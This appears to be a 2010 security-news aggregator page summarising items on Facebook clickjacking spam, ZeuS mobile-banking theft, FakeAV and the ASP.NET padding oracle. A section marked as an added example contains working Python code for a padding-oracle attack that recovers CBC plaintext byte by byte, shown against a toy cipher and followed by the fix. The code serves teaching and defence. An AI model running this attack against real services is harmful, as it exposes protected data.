Information Filed Under ‘Web Service Security’ Category
Say you’re a social media spammer that drives traffic to CPAlead.com surveys… What do you do when English speakers are increasingly desensitized towards Facebook spam? Language localization! We’re currently seeing a run of Facebook spam that uses the following subject: “Voi paska, katso miten kävi kun isä näki tyttärensä webcam-esityksen” It’s a Finnish translation of the popular English spam subject: “OMG, dad catches daughter on webcam” The spam links to a Facebook Page. After clicking on the confirm button, the user is asked to click a series of numbered buttons. This is a form of clickjacking that results in the link being shared to the user’s profile, thus spreading to friends via the News Feed.

Go here to read the rest:
Voi Paska, Facebook Spam Localized in Finnish
On September 19th and 20th, over 600 sites, mainly in Malaysia and Indonesia, were temporarily listed by Google as potentially harmful. The roll call of sites affected includes many of Malaysia’s major online media sites, including TheStar, Malaysiakini, Berita Harian and the Malaysian Insider.
See the original post:
1 Ad Service Compromised, 1 Country’s Users Annoyed
Online gossip magazine Radar Online is reporting that NBA star Shaquille O’Neal is facing a lawsuit accusing him of hacking, destroying evidence and attempting to frame an employee by planting child pornography on his computer. According to the lawsuit, O’Neal also threw a personal computer into the lake behind his home. O’Neal (widely known by his nickname ‘Shaq’) is one of the most famous professional basketball players in the world and one of the wealthiest sports stars overall.

See the rest here:
Shaq is Wack
Adobe released a security advisory for Flash Player yesterday: “There are reports that this vulnerability is being actively exploited in the wild against Adobe Flash Player on Windows.” Flash Player will be patched the week of September 27, 2010. Flash technology is also embedded in Reader and Acrobat.

Read the original here:
Adobe Advisories
Microsoft has released an out-of-band security bulletin (MS10-070) for the ASP.NET “information disclosure” vulnerability. The short version of the vulnerability is that exploiting it generates unintended error messages containing information that an attacker may be able to use to view or compromise data. According to the bulletin, any application running on the ASP.NET platform is vulnerable.
Go here to see the original:
Patch for ASP.net Information Disclosure Vulnerability Released
There’s an interesting Windows+mobile case today involving a ZeuS variant that steals mTANs, using a Symbian (.sis) or BlackBerry (.jad) component. An mTAN is a mobile transaction authentication number, sent via SMS, and is used by some banks as a single-use one-time password to authorize an online financial transaction.
Read more:
ZeuS Variants Targeting Mobile Banking
Like it or not, Twitter is important. It is not only used for chit-chat, but it has turned out to be the fastest way to get eye-witness reports from people who are on location whenever something happens.

Read the original:
Get the Hackers on Your Side
“I’m just freelancing while I’m looking for a job.” “I’m just freelancing while I build up my company.” “I’m just freelancing until something better comes along.” It’s easy to come to the conclusion that any ambitious freelancer is looking to get out of the freelancing game.

See more here:
What’s the Career Path for Ambitious Freelancers?
The recent publicity and ranting about Twitter’s onMouseOver flaw got me thinking about our perception of software quality and expectations of risk. Why is there no room for error when Twitter makes a mistake, yet we put up with so many bigger – and more personal – issues in our everyday lives? Imagine if every quality issue we experience in our daily lives resulted in the kind of alarm the Twitter discovery did.

Read more:
Why all the hoopla over the Twitter onMouseOver flaw?
Today, at SophosLabs, we encountered another interesting rogue security software variant, Troj/FakeAV-BTN. When run, Troj/FakeAV-BTN poses as a Microsoft Security Essentials Alert and detects only one file, as “Unknown Win32/Trojan”. When the user wants to remove this fake threat, the malware offers a “Scan online” option.

See the rest here:
Choose your FakeAV?
An updated build of Acunetix WVS Version 7 has been released. Apart from a number of improvements and bug fixes, this build will also automatically check for the latest OpenX OFC file upload vulnerability and the ASP.NET padding oracle vulnerability.

See the rest here:
Acunetix WVS Version 7 build 20100921 released
The attackers behind the spammed HTML redirects I blogged about last week have been busy over the last few days. In an ongoing attempt to evade detection they have continually tweaked and changed the manner in which the redirect is being hidden. In this post I will take a quick look at the evolution of these scripts, which we block as JS/WndRed-B.

Go here to read the rest:
Cat ‘n Mouse with spammed HTML redirects.
Everybody’s talking about the ASP.NET padding oracle vulnerability disclosed a few days ago at the ekoparty Security Conference.

Go here to see the original:
How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability
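The bug behind the MS10-070 bulletin above and the vulnerability check described here is a padding oracle: an application that responds differently when a CBC ciphertext decrypts to invalid PKCS#7 padding than when it decrypts cleanly lets an attacker recover the plaintext one byte at a time without the key. The following is an added example, not code from the page, from Microsoft or from any of the linked posts. It shows the leaky server behaviour next to the attack that exploits it. The key, IV and message are constructed for the demo, and a toy Feistel block cipher built from SHA-256 stands in for AES so that the file runs with only the Python standard library; the attack logic itself does not depend on which block cipher is in use.

```python
"""Padding-oracle attack against CBC mode, the class of bug behind MS10-070.

Added example. The block cipher below is a 4-round Feistel network keyed with
SHA-256, a toy stand-in for AES; the oracle attack is cipher-agnostic.
"""
import hashlib

BLOCK = 16
KEY = b"server-side-secret-key-constructed"   # constructed demo key, never leaves the server


class PaddingError(Exception):
    """The distinguishable failure that leaks one bit per query."""


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, rnd):
    # Feistel round function: keyed hash of one 8-byte half, truncated to 8 bytes
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r


def decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("invalid padding")
    return data[:-n]


def cbc_encrypt(key, iv, padded_plaintext):
    out, prev = b"", iv
    for i in range(0, len(padded_plaintext), BLOCK):
        prev = encrypt_block(key, _xor(padded_plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def padding_oracle(prev_block, block):
    """Vulnerable server: the caller learns whether padding verified.

    In MS10-070 this was the difference between error responses; here it is a bool.
    """
    try:
        pkcs7_unpad(_xor(prev_block, decrypt_block(KEY, block)))
        return True
    except PaddingError:
        return False


def padding_oracle_attack(oracle, iv, ciphertext):
    """Recover the plaintext using only the oracle; the key is never used."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)                 # D_k(cur), recovered from the right
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos                    # padding value we try to force
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):      # already-known bytes set to 'pad'
                forged[j] = inter[j] ^ pad
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), cur):
                    continue
                if pad == 1:
                    # 0x01 is ambiguous with e.g. 0x02 0x02: flip the byte to the
                    # left and re-query; a genuine 0x01 still verifies.
                    probe = bytearray(forged)
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe), cur):
                        continue
                inter[pos] = guess ^ pad
                break
        plaintext += _xor(inter, prev)           # P_i = D_k(C_i) XOR C_(i-1)
    return pkcs7_unpad(plaintext)


def demo():
    iv = bytes(range(BLOCK))                     # constructed, assumed public
    message = b"ViewState: attacker must not read this"
    ct = cbc_encrypt(KEY, iv, pkcs7_pad(message))
    return padding_oracle_attack(padding_oracle, iv, ct)


if __name__ == "__main__":
    print(demo())
```

Each byte costs at most 256 queries, so a full block falls in a few thousand requests, which is why scanners can check for the condition automatically. The cure is to remove the oracle: return a single uniform error for every decryption failure (Microsoft’s interim workaround was one custom error page for all errors) and, better, authenticate ciphertexts with a MAC before decrypting so that tampered data is rejected without ever reaching the padding check.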
Probably my biggest pet peeve related to application security is the claim by many (typically management) that “We know we’re secure, we just had an audit”. I can’t tell you how many times I’ve seen this situation. Management will require their administrators to go down some random checklist or run a basic vulnerability scan.

See the article here:
Why do so many people buy into “checklist” audits?
By Hans M. Kristensen The next steps in European security should include additional reductions in the number of short-range nuclear weapons in Europe, according to a video statement issued by NATO Secretary General Anders Fogh Rasmussen: “We also have to make progress sooner or later in our efforts to reduce the number of short-range nuclear weapons
Read the original post:
Rasmussen: Lay Short-Range Nuclear Weapons Thinking to Rest
This week I have been putting the finishing touches to my presentation for the Virus Bulletin Conference in Vancouver later this month. While doing the research I have collected a large corpus of PDF files; the results of analyzing these files form the bulk of my presentation.
None of us would want to be operated on by an unlicensed surgeon, so why should we put trust in software applications written by unlicensed, uncertified programmers? Apple have seemingly taken the high road by requiring programmers to register as Apple developers (for a small-but-not-negligible fee) before they can deploy their code to a device (even if it’s just their own).

Go here to read the rest:
License to code
Sophos users over the past few months may have noticed that they haven’t been able to access parts of the Somerset Information Exchange (SiX) due to instances of Mal/Badsrc-C on the site. The problems for the SiX microsite, hosted on somerset.gov.uk, are larger than just malicious SCRIPT tags on pages. The site also has injected Blackhat SEO code on the main site, and the insurance area of the site is riddled with injected scripts. Every day, SophosLabs see thousands of infected websites, including .gov websites from around the world.

More here:
Somerset County Council website victim of Blackhat SEO and malware injection
This week we’ve seen more phishing spam targeting the Commonwealth Bank of Australia, an institution that many scammers have aimed at in the past. The emails have a subject of “Update your Commonwealth Bank”. The text is standard scaremongering. Opening with “Customer ID : 000-5432-654386-PSI” does make the email look more official, and presumably relies on the fact that most customers don’t remember their own personal number.

Read this article:
Infected Phish
12 posts left… While doing some research I happened across an old post of mine that I had totally forgotten about. It was an old post about betting on the chances of compromise. Specifically, I was asked to give odds on whether I thought Google or ha.ckers.org would survive a penetration test (ultimately leading to disclosure of data).
Go here to see the original:
Odds, Disclosure, Etc…